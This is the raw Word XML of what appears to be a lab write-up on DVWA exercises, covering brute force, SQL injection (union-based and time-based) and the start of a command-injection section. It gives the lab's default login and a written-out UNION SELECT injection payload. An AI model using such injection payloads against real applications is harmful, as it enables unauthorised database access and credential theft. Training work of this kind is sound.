    <w:p w14:paraId="47E1959E"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09C8FAB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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA1C73C"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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E3A0391"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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="622FDDDE"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615F8B00"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29647AC9" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC7273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DVWA Exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC9DBA7" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc115782533"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Brute Force – Low level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="33FC716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The correct answer is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76967CA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Username: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06396B3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Password: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D2CE5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A73FE2">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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD804C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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D802E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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474F4F4B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A1C1EB" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc115782534"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>SQL injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="00992DC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A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> query. 1=1 means that the query is always true, so it returns all the data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7D601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57DB37EE" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc115782535"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>SQLi – Low level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="0FFD7CF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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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4550143A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C24DB0D" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc115782536"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:lastRenderedPageBreak/>
        <w:t>SQLi – Medium level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="1CF43D5E"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For this I would choose Burp Suite to help me manipulate the POST request. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550943B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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71B7317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Default="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346AE85B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0460C7C0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc115782537"/>
      <w:r>
        <w:t>SQLi – Online Challenges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="0FDBB851" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="0068665A" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="7B3AAB4D"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4CAABCD"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E2D90A5"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705F329E"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Default="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A20E25"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3C056208"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Default="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F7B4FAC"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68AC6920" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3949E357"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And it returns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3058B302"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Pr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and we can access them using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FFC95B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FDC8E1C" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B44B125" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>admin123' UNION SELECT 1,2,3 where database() like 'D%';--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754CC4A3" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w: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Default="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>What is step 2?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C706B2"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0558988F" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">We repeat the same thing but for the table name this time. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E15AC6" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Step 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6439F2"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420FAE7D" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>We keep guessing the column name. After getting all the column names, we can retrieve the data inside that column using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA5C660"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68B85053" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="003574AF" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EE7F4F"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3596B68B"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p>
    <w:p w14:paraId="71E5B8DA" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="003574AF" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F1898B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11366733"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6F21D0DD" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>With this technique, we can get to the username and the password then log in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F56971B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="37EFEB82" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQLi - TIME BASED </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2AA815" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="217ED68B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">It has the same idea as the previous method. When the entered statement is true, the response should be delayed for some seconds. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F94CB8"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C00E77E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>If the database has 2 columns(TRUE STATEMENT) the response should be delayed 5 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BD8C8A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Then we can proceed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C553B7" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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08295532" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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34B61E1B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="0033795E" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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49ADBB76" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="003574AF" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="28FD8CEA" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2213A7D4" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="671A3A0B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7431A384" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5AF1E5" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EFEAA3E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD5F460" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D0CD747" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10AB6E73" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB8F956" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22421DA1" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D77649B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485B7436" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="778616A7" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc115782538"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Command Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="6E1FF91B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA46523" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc115782539"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Command Injection – Low level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="4CC8D1F2" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2B0FC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4208F71F" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFD3215" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487736F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 Let us see the code behind this function: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070F0849" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BD9955" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B0304B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C395BA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479CF29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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, etc).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B12596C" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39FD7FA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76A09FAD" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B1AAEB4" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19ACF6CD" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B84CDEC" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DC9A1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3A106FDF" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A0A01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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
